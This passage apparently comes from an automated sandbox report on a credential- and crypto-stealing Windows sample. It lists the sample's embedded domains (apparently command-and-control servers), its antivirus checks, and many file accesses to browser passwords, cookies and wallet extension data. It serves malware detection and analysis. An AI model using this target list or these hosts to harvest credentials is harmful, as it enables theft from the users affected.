                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: BnJxmraqlk.exe, 00000000.00000003.2254593522.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: BnJxmraqlk.exe, 00000000.00000003.2256284271.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeProcess information queried: ProcessInformationJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                    Source: BnJxmraqlk.exe, 00000000.00000003.2165832368.0000000002D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: spottercurvei.click
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305155106.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295509081.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2339472912.0000000000F0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: Process Memory Space: BnJxmraqlk.exe PID: 612, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: BnJxmraqlk.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.BnJxmraqlk.exe.1c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2097325289.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2349512042.000000000021B000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2165991499.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets8
                    Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                    Source: BnJxmraqlk.exe, 00000000.00000003.2304715478.0000000000F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","e
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: BnJxmraqlk.exeString found in binary or memory: Wallets/Exodus
                    Source: BnJxmraqlk.exe, 00000000.00000003.2295565862.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                    Source: BnJxmraqlk.exeString found in binary or memory: keystore
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\BnJxmraqlk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
